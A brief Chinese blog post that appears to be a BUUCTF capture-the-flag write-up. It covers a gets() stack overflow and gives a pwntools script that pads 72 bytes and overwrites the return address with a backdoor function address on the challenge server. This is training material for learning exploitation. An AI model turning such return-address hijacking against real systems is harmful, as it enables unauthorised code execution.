文章目录

Gets 栈溢出

由 雾島风起時 发布

Gets 栈溢出

话不多说,直接上题(BUUCTF)

IDA64 反编译

给出了后门函数

看内存溢出大小是 72

构造 payload

from pwn import *

p = remote("node5.buuoj.cn", 27079)

payload = b'a' * 72 + p64(0x40060D)

p.sendline(payload)
p.interactive()

拿到 flag


0条评论

发表评论